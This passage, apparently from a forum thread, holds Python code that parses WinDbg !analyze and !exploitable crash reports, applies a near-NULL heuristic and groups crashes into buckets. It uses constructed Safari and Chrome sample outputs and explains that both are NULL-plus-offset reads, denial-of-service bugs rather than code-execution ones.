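    # !exploitable supplies a verdict; a plain !analyze report only gets the
    # near-NULL heuristic, everything else stays UNKNOWN for a human to look at.
    classification = first("CLASSIFICATION") or (
        "PROBABLY_NOT_EXPLOITABLE" if near_null else "UNKNOWN")
    description = (first("SHORT_DESCRIPTION") or first("PRIMARY_PROBLEM_CLASS")
                   or "unclassified")

    # Bucket key: !exploitable's stack hashes when present, else !analyze's
    # bucket id, else the top stack frame.
    if first("MAJOR_HASH") and first("MINOR_HASH"):
        bucket = f"{first('MAJOR_HASH')}.{first('MINOR_HASH')}"
    else:
        bucket = first("FAILURE_BUCKET_ID") or first("STACK_FRAME") or "unknown"
    return CrashSummary(addr, near_null, classification, description, bucket)


def bucket_crashes(reports: Dict[str, str]) -> Dict[str, List[str]]:
    """Group named crash reports by bucket so each unique crash is reviewed once."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for name, text in reports.items():
        groups[summarize(text).bucket].append(name)
    return dict(groups)


# Constructed samples, abbreviated from the output posted in this thread.
SAFARI_EXPLOITABLE = """\
EXCEPTION_FAULTING_ADDRESS:0xc
EXCEPTION_CODE:0xC0000005
EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION
EXCEPTION_SUBTYPE:READ
STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0x643d2
STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0x6479d
MAJOR_HASH:0xf6e17282
MINOR_HASH:0x044732ce
SHORT_DESCRIPTION:ReadAVNearNull
CLASSIFICATION:PROBABLY_NOT_EXPLOITABLE
"""

CHROME_ANALYZE = """\
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 0000000c
READ_ADDRESS: 0000000c
PRIMARY_PROBLEM_CLASS: NULL_CLASS_PTR_DEREFERENCE
FAILURE_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE_c0000005_chrome.dll!ovly_debug_event
"""

if __name__ == "__main__":
    reports = {"safari": SAFARI_EXPLOITABLE, "chrome": CHROME_ANALYZE}
    for name, text in reports.items():
        print(name, summarize(text))
    print(bucket_crashes(reports))
```

Both reports reduce to a read at address 0xc, which the heuristic and !exploitable agree is a NULL-plus-offset read and therefore a denial-of-service bug rather than a code-execution primitive; the stack hashes let a second Safari report of the same crash fall into the same bucket instead of a fresh ticket.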
